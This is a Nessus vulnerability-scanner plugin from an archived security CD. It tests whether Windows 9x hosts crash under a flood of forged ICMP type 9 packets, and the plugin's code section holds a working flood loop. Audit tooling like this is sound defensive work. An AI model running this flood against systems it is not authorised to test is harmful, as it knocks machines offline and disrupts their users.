home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / p-smash.nasl < prev    next >
Encoding:
Text File  |  2005-03-31  |  2.9 KB  |  106 lines
  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  5. #      Erik Anderson <eanders@carmichaelsecurity.com>
  6. #      Added link to the Microsoft Knowledgebase
  7. #
  8. # GPL
  9. #
  10. # According to "Paulo Ribeiro" <prrar@NITNET.COM.BR> on VULN-DEV,
  11. # Windows 9x cannot handle ICMP type 9 messages.
  12. # This should slow down Windows 95 and crash Windows 98
  13. #
  14.  
  15. if(description)
  16. {
  17.  script_id(11024);
  18.  script_version ("$Revision: 1.7 $");
  19.  name["english"] = "p-smash DoS (ICMP 9 flood)";
  20.  name["francais"] = "DΘni de service p-smash (inondation ICMP 9)";
  21.  script_name(english:name["english"], francais:name["francais"]);
  22.  
  23.  desc["english"] = "It was possible to crash the remote 
  24. machine by flooding it with ICMP type 9 packets.
  25.  
  26. A cracker may use this attack to make this
  27. host crash continuously, preventing you
  28. from working properly.
  29.  
  30.  
  31. Solution : upgrade your Windows 9x operating system or change it.
  32.  
  33. Reference : http://support.microsoft.com/default.aspx?scid=KB;en-us;q216141
  34.  
  35. Risk factor : High";
  36.  
  37.  desc["francais"] = "Il a ΘtΘ possible de
  38. faire planter la machine distante en l'inondant
  39. de paquets ICMP type 9.
  40.  
  41. Un pirate peut utiliser ce problΦme pour tuer 
  42. continuellement cette machine, vous empechant 
  43. de travailler correctement.
  44.  
  45.  
  46. Solution : mettez α jour votre systΦme d'exploitation 
  47. Windows 9x ou changez le.
  48.  
  49. Facteur de risque : ElevΘ";
  50.  
  51.  script_description(english:desc["english"], francais:desc["francais"]);
  52.  
  53.  summary["english"] = "Flood the remote machine with ICMP 9";
  54.  summary["francais"] = "Inonde la machine d'ICMP 9";
  55.  script_summary(english:summary["english"], francais:summary["francais"]);
  56.  
  57.  script_category(ACT_KILL_HOST);
  58.   
  59.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  60.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  61.  family["english"] = "Denial of Service";
  62.  family["francais"] = "DΘni de service";
  63.  #family["english"] = "Untested";
  64.  #family["francais"] = "Untested";
  65.  
  66.  script_family(english:family["english"], francais:family["francais"]);
  67.            
  68. # script_add_preference(name:"Flood length :",     type:"entry", value:"5000");    
  69. # script_add_preference(name:"Data length :",     type:"entry", value:"500");    
  70.  exit(0);
  71. }
  72.  
  73. #
  74. # The script code starts here
  75. #
  76.  
  77. start_denial();
  78.  
  79. fl = script_get_preference("Flood length :");
  80. if (! fl) fl = 5000;
  81. dl = script_get_preference("Data length :");
  82. if (! dl) dl = 500;
  83.  
  84. src = this_host();
  85. dst = get_host_ip();
  86. id = 804;
  87. s = 0;
  88. d = crap(dl);
  89. for (i = 0; i < fl; i = i + 1)
  90. {
  91.  id = id + 1;
  92.  ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off:0,ip_len:20,
  93.                       ip_p:IPPROTO_ICMP, ip_id:id, ip_ttl:0x40,
  94.               ip_src:this_host());
  95.  icmp = forge_icmp_packet(ip:ip, icmp_type:9, icmp_code:0,
  96.                icmp_seq: s, icmp_id:s, data:d);
  97.  s = s + 1;
  98.  send_packet(icmp, pcap_active: 0);
  99. }
  100.  
  101. alive = end_denial();
  102. if(!alive){
  103.     security_hole();
  104.     set_kb_item(name:"Host/dead", value:TRUE);
  105. }
  106.